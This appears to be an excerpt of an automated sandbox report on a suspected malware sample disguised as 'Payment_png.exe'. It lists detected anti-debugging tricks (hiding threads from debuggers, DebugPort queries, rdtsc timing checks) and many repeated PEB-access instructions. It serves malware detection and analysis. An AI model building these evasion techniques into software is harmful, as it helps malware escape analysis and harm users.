Source: explorer.exe, 00000006.00000000.289700052.0000000008220000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\Payment_png.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Contains functionality to hide a thread from the debugger

Show sources

Source: C:\Users\user\Desktop\Payment_png.exe

Code function: 0_2_02220438 NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000

0_2_02220438

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\Payment_png.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\Payment_png.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\Payment_png.exe	Thread information set: HideFromDebugger	Jump to behavior

Source: C:\Users\user\Desktop\Payment_png.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\Payment_png.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\Payment_png.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\Payment_png.exe

Code function: 0_2_02220604 rdtsc

0_2_02220604

Source: C:\Users\user\Desktop\Payment_png.exe

Code function: 0_2_022228D0 LdrInitializeThunk,

0_2_022228D0

Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 0_2_02222415 mov eax, dword ptr fs:[00000030h]	0_2_02222415
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 0_2_02224B11 mov eax, dword ptr fs:[00000030h]	0_2_02224B11
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 0_2_02221369 mov eax, dword ptr fs:[00000030h]	0_2_02221369
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 0_2_02224377 mov eax, dword ptr fs:[00000030h]	0_2_02224377
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 0_2_022219A3 mov eax, dword ptr fs:[00000030h]	0_2_022219A3
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 0_2_02221986 mov eax, dword ptr fs:[00000030h]	0_2_02221986
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 0_2_02223BE9 mov eax, dword ptr fs:[00000030h]	0_2_02223BE9
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E46AE44 mov eax, dword ptr fs:[00000030h]	2_2_1E46AE44
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E46AE44 mov eax, dword ptr fs:[00000030h]	2_2_1E46AE44
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3AE620 mov eax, dword ptr fs:[00000030h]	2_2_1E3AE620
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3DA61C mov eax, dword ptr fs:[00000030h]	2_2_1E3DA61C
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3DA61C mov eax, dword ptr fs:[00000030h]	2_2_1E3DA61C
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3AC600 mov eax, dword ptr fs:[00000030h]	2_2_1E3AC600
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3AC600 mov eax, dword ptr fs:[00000030h]	2_2_1E3AC600
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3AC600 mov eax, dword ptr fs:[00000030h]	2_2_1E3AC600
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3D8E00 mov eax, dword ptr fs:[00000030h]	2_2_1E3D8E00
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E461608 mov eax, dword ptr fs:[00000030h]	2_2_1E461608
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3CAE73 mov eax, dword ptr fs:[00000030h]	2_2_1E3CAE73
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3CAE73 mov eax, dword ptr fs:[00000030h]	2_2_1E3CAE73
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3CAE73 mov eax, dword ptr fs:[00000030h]	2_2_1E3CAE73
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3CAE73 mov eax, dword ptr fs:[00000030h]	2_2_1E3CAE73
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3CAE73 mov eax, dword ptr fs:[00000030h]	2_2_1E3CAE73
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3B766D mov eax, dword ptr fs:[00000030h]	2_2_1E3B766D
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E45FE3F mov eax, dword ptr fs:[00000030h]	2_2_1E45FE3F
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3B7E41 mov eax, dword ptr fs:[00000030h]	2_2_1E3B7E41
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3B7E41 mov eax, dword ptr fs:[00000030h]	2_2_1E3B7E41
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3B7E41 mov eax, dword ptr fs:[00000030h]	2_2_1E3B7E41
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3B7E41 mov eax, dword ptr fs:[00000030h]	2_2_1E3B7E41
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3B7E41 mov eax, dword ptr fs:[00000030h]	2_2_1E3B7E41
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3B7E41 mov eax, dword ptr fs:[00000030h]	2_2_1E3B7E41
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E45FEC0 mov eax, dword ptr fs:[00000030h]	2_2_1E45FEC0
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E478ED6 mov eax, dword ptr fs:[00000030h]	2_2_1E478ED6
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E43FE87 mov eax, dword ptr fs:[00000030h]	2_2_1E43FE87
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3B76E2 mov eax, dword ptr fs:[00000030h]	2_2_1E3B76E2
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3D16E0 mov ecx, dword ptr fs:[00000030h]	2_2_1E3D16E0
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E470EA5 mov eax, dword ptr fs:[00000030h]	2_2_1E470EA5
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E470EA5 mov eax, dword ptr fs:[00000030h]	2_2_1E470EA5
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E470EA5 mov eax, dword ptr fs:[00000030h]	2_2_1E470EA5
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E4246A7 mov eax, dword ptr fs:[00000030h]	2_2_1E4246A7
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3D36CC mov eax, dword ptr fs:[00000030h]	2_2_1E3D36CC
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3E8EC7 mov eax, dword ptr fs:[00000030h]	2_2_1E3E8EC7
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3CB73D mov eax, dword ptr fs:[00000030h]	2_2_1E3CB73D
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3CB73D mov eax, dword ptr fs:[00000030h]	2_2_1E3CB73D
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3DE730 mov eax, dword ptr fs:[00000030h]	2_2_1E3DE730
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3A4F2E mov eax, dword ptr fs:[00000030h]	2_2_1E3A4F2E
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3A4F2E mov eax, dword ptr fs:[00000030h]	2_2_1E3A4F2E
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3CF716 mov eax, dword ptr fs:[00000030h]	2_2_1E3CF716
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E478F6A mov eax, dword ptr fs:[00000030h]	2_2_1E478F6A
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3DA70E mov eax, dword ptr fs:[00000030h]	2_2_1E3DA70E
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3DA70E mov eax, dword ptr fs:[00000030h]	2_2_1E3DA70E
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E47070D mov eax, dword ptr fs:[00000030h]	2_2_1E47070D
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E47070D mov eax, dword ptr fs:[00000030h]	2_2_1E47070D
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E43FF10 mov eax, dword ptr fs:[00000030h]	2_2_1E43FF10
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E43FF10 mov eax, dword ptr fs:[00000030h]	2_2_1E43FF10
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3BFF60 mov eax, dword ptr fs:[00000030h]	2_2_1E3BFF60
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3BEF40 mov eax, dword ptr fs:[00000030h]	2_2_1E3BEF40
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3B8794 mov eax, dword ptr fs:[00000030h]	2_2_1E3B8794
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3E37F5 mov eax, dword ptr fs:[00000030h]	2_2_1E3E37F5
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E427794 mov eax, dword ptr fs:[00000030h]	2_2_1E427794
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E427794 mov eax, dword ptr fs:[00000030h]	2_2_1E427794
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E427794 mov eax, dword ptr fs:[00000030h]	2_2_1E427794
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3DBC2C mov eax, dword ptr fs:[00000030h]	2_2_1E3DBC2C
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E43C450 mov eax, dword ptr fs:[00000030h]	2_2_1E43C450
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E43C450 mov eax, dword ptr fs:[00000030h]	2_2_1E43C450
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E461C06 mov eax, dword ptr fs:[00000030h]	2_2_1E461C06
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E461C06 mov eax, dword ptr fs:[00000030h]	2_2_1E461C06
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E461C06 mov eax, dword ptr fs:[00000030h]	2_2_1E461C06
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E461C06 mov eax, dword ptr fs:[00000030h]	2_2_1E461C06
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E461C06 mov eax, dword ptr fs:[00000030h]	2_2_1E461C06
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E461C06 mov eax, dword ptr fs:[00000030h]	2_2_1E461C06
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E461C06 mov eax, dword ptr fs:[00000030h]	2_2_1E461C06
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E461C06 mov eax, dword ptr fs:[00000030h]	2_2_1E461C06
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E461C06 mov eax, dword ptr fs:[00000030h]	2_2_1E461C06
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E461C06 mov eax, dword ptr fs:[00000030h]	2_2_1E461C06
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E461C06 mov eax, dword ptr fs:[00000030h]	2_2_1E461C06
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E461C06 mov eax, dword ptr fs:[00000030h]	2_2_1E461C06
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E461C06 mov eax, dword ptr fs:[00000030h]	2_2_1E461C06
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E461C06 mov eax, dword ptr fs:[00000030h]	2_2_1E461C06
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3DAC7B mov eax, dword ptr fs:[00000030h]	2_2_1E3DAC7B
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3DAC7B mov eax, dword ptr fs:[00000030h]	2_2_1E3DAC7B
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3DAC7B mov eax, dword ptr fs:[00000030h]	2_2_1E3DAC7B
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3DAC7B mov eax, dword ptr fs:[00000030h]	2_2_1E3DAC7B
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3DAC7B mov eax, dword ptr fs:[00000030h]	2_2_1E3DAC7B
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3DAC7B mov eax, dword ptr fs:[00000030h]	2_2_1E3DAC7B
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3DAC7B mov eax, dword ptr fs:[00000030h]	2_2_1E3DAC7B
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3DAC7B mov eax, dword ptr fs:[00000030h]	2_2_1E3DAC7B
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3DAC7B mov eax, dword ptr fs:[00000030h]	2_2_1E3DAC7B
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3DAC7B mov eax, dword ptr fs:[00000030h]	2_2_1E3DAC7B
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3DAC7B mov eax, dword ptr fs:[00000030h]	2_2_1E3DAC7B
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E426C0A mov eax, dword ptr fs:[00000030h]	2_2_1E426C0A
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E426C0A mov eax, dword ptr fs:[00000030h]	2_2_1E426C0A
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E426C0A mov eax, dword ptr fs:[00000030h]	2_2_1E426C0A
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E426C0A mov eax, dword ptr fs:[00000030h]	2_2_1E426C0A
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E47740D mov eax, dword ptr fs:[00000030h]	2_2_1E47740D
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E47740D mov eax, dword ptr fs:[00000030h]	2_2_1E47740D
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E47740D mov eax, dword ptr fs:[00000030h]	2_2_1E47740D
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3CB477 mov eax, dword ptr fs:[00000030h]	2_2_1E3CB477
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3CB477 mov eax, dword ptr fs:[00000030h]	2_2_1E3CB477
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3CB477 mov eax, dword ptr fs:[00000030h]	2_2_1E3CB477
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3CB477 mov eax, dword ptr fs:[00000030h]	2_2_1E3CB477
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3CB477 mov eax, dword ptr fs:[00000030h]	2_2_1E3CB477
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3CB477 mov eax, dword ptr fs:[00000030h]	2_2_1E3CB477
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3CB477 mov eax, dword ptr fs:[00000030h]	2_2_1E3CB477
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3CB477 mov eax, dword ptr fs:[00000030h]	2_2_1E3CB477
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3CB477 mov eax, dword ptr fs:[00000030h]	2_2_1E3CB477
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3CB477 mov eax, dword ptr fs:[00000030h]	2_2_1E3CB477
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3CB477 mov eax, dword ptr fs:[00000030h]	2_2_1E3CB477
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3CB477 mov eax, dword ptr fs:[00000030h]	2_2_1E3CB477
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3C746D mov eax, dword ptr fs:[00000030h]	2_2_1E3C746D
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3DA44B mov eax, dword ptr fs:[00000030h]	2_2_1E3DA44B
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E478CD6 mov eax, dword ptr fs:[00000030h]	2_2_1E478CD6
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3B849B mov eax, dword ptr fs:[00000030h]	2_2_1E3B849B
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E426CF0 mov eax, dword ptr fs:[00000030h]	2_2_1E426CF0
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E426CF0 mov eax, dword ptr fs:[00000030h]	2_2_1E426CF0
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E426CF0 mov eax, dword ptr fs:[00000030h]	2_2_1E426CF0
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E4614FB mov eax, dword ptr fs:[00000030h]	2_2_1E4614FB
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E464496 mov eax, dword ptr fs:[00000030h]	2_2_1E464496
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E464496 mov eax, dword ptr fs:[00000030h]	2_2_1E464496
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E464496 mov eax, dword ptr fs:[00000030h]	2_2_1E464496
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E464496 mov eax, dword ptr fs:[00000030h]	2_2_1E464496
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E464496 mov eax, dword ptr fs:[00000030h]	2_2_1E464496
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E464496 mov eax, dword ptr fs:[00000030h]	2_2_1E464496
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E464496 mov eax, dword ptr fs:[00000030h]	2_2_1E464496
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E464496 mov eax, dword ptr fs:[00000030h]	2_2_1E464496
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E464496 mov eax, dword ptr fs:[00000030h]	2_2_1E464496
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E464496 mov eax, dword ptr fs:[00000030h]	2_2_1E464496
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E464496 mov eax, dword ptr fs:[00000030h]	2_2_1E464496
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E464496 mov eax, dword ptr fs:[00000030h]	2_2_1E464496
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E464496 mov eax, dword ptr fs:[00000030h]	2_2_1E464496
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E423540 mov eax, dword ptr fs:[00000030h]	2_2_1E423540
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E453D40 mov eax, dword ptr fs:[00000030h]	2_2_1E453D40
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3D4D3B mov eax, dword ptr fs:[00000030h]	2_2_1E3D4D3B
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3D4D3B mov eax, dword ptr fs:[00000030h]	2_2_1E3D4D3B
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3D4D3B mov eax, dword ptr fs:[00000030h]	2_2_1E3D4D3B
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3AAD30 mov eax, dword ptr fs:[00000030h]	2_2_1E3AAD30
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]	2_2_1E3B3D34
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]	2_2_1E3B3D34
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]	2_2_1E3B3D34
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]	2_2_1E3B3D34
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]	2_2_1E3B3D34
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]	2_2_1E3B3D34
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]	2_2_1E3B3D34
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]	2_2_1E3B3D34
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]	2_2_1E3B3D34
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]	2_2_1E3B3D34
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]	2_2_1E3B3D34
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]	2_2_1E3B3D34
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]	2_2_1E3B3D34
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3CC577 mov eax, dword ptr fs:[00000030h]	2_2_1E3CC577
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3CC577 mov eax, dword ptr fs:[00000030h]	2_2_1E3CC577
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3C7D50 mov eax, dword ptr fs:[00000030h]	2_2_1E3C7D50
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E478D34 mov eax, dword ptr fs:[00000030h]	2_2_1E478D34
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E42A537 mov eax, dword ptr fs:[00000030h]	2_2_1E42A537
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3E3D43 mov eax, dword ptr fs:[00000030h]	2_2_1E3E3D43
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E46E539 mov eax, dword ptr fs:[00000030h]	2_2_1E46E539
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3D1DB5 mov eax, dword ptr fs:[00000030h]	2_2_1E3D1DB5
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3D1DB5 mov eax, dword ptr fs:[00000030h]	2_2_1E3D1DB5
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3D1DB5 mov eax, dword ptr fs:[00000030h]	2_2_1E3D1DB5
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E426DC9 mov eax, dword ptr fs:[00000030h]	2_2_1E426DC9
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E426DC9 mov eax, dword ptr fs:[00000030h]	2_2_1E426DC9
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E426DC9 mov eax, dword ptr fs:[00000030h]	2_2_1E426DC9
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E426DC9 mov ecx, dword ptr fs:[00000030h]	2_2_1E426DC9
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E426DC9 mov eax, dword ptr fs:[00000030h]	2_2_1E426DC9
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E426DC9 mov eax, dword ptr fs:[00000030h]	2_2_1E426DC9
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3D35A1 mov eax, dword ptr fs:[00000030h]	2_2_1E3D35A1
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E46FDE2 mov eax, dword ptr fs:[00000030h]	2_2_1E46FDE2
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E46FDE2 mov eax, dword ptr fs:[00000030h]	2_2_1E46FDE2
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E46FDE2 mov eax, dword ptr fs:[00000030h]	2_2_1E46FDE2
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E46FDE2 mov eax, dword ptr fs:[00000030h]	2_2_1E46FDE2
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3DFD9B mov eax, dword ptr fs:[00000030h]	2_2_1E3DFD9B
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3DFD9B mov eax, dword ptr fs:[00000030h]	2_2_1E3DFD9B
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3A2D8A mov eax, dword ptr fs:[00000030h]	2_2_1E3A2D8A
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3A2D8A mov eax, dword ptr fs:[00000030h]	2_2_1E3A2D8A
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3A2D8A mov eax, dword ptr fs:[00000030h]	2_2_1E3A2D8A
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3A2D8A mov eax, dword ptr fs:[00000030h]	2_2_1E3A2D8A
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3A2D8A mov eax, dword ptr fs:[00000030h]	2_2_1E3A2D8A
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E458DF1 mov eax, dword ptr fs:[00000030h]	2_2_1E458DF1
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3D2581 mov eax, dword ptr fs:[00000030h]	2_2_1E3D2581
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3D2581 mov eax, dword ptr fs:[00000030h]	2_2_1E3D2581
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3D2581 mov eax, dword ptr fs:[00000030h]	2_2_1E3D2581
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3D2581 mov eax, dword ptr fs:[00000030h]	2_2_1E3D2581
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E462D82 mov eax, dword ptr fs:[00000030h]	2_2_1E462D82
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E462D82 mov eax, dword ptr fs:[00000030h]	2_2_1E462D82
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E462D82 mov eax, dword ptr fs:[00000030h]	2_2_1E462D82
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E462D82 mov eax, dword ptr fs:[00000030h]	2_2_1E462D82
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E462D82 mov eax, dword ptr fs:[00000030h]	2_2_1E462D82
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E462D82 mov eax, dword ptr fs:[00000030h]	2_2_1E462D82
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E462D82 mov eax, dword ptr fs:[00000030h]	2_2_1E462D82
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3BD5E0 mov eax, dword ptr fs:[00000030h]	2_2_1E3BD5E0
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3BD5E0 mov eax, dword ptr fs:[00000030h]	2_2_1E3BD5E0
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E4705AC mov eax, dword ptr fs:[00000030h]	2_2_1E4705AC
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E4705AC mov eax, dword ptr fs:[00000030h]	2_2_1E4705AC
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3E4A2C mov eax, dword ptr fs:[00000030h]	2_2_1E3E4A2C
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3E4A2C mov eax, dword ptr fs:[00000030h]	2_2_1E3E4A2C
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E46EA55 mov eax, dword ptr fs:[00000030h]	2_2_1E46EA55
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E434257 mov eax, dword ptr fs:[00000030h]	2_2_1E434257
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3CA229 mov eax, dword ptr fs:[00000030h]	2_2_1E3CA229
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3CA229 mov eax, dword ptr fs:[00000030h]	2_2_1E3CA229
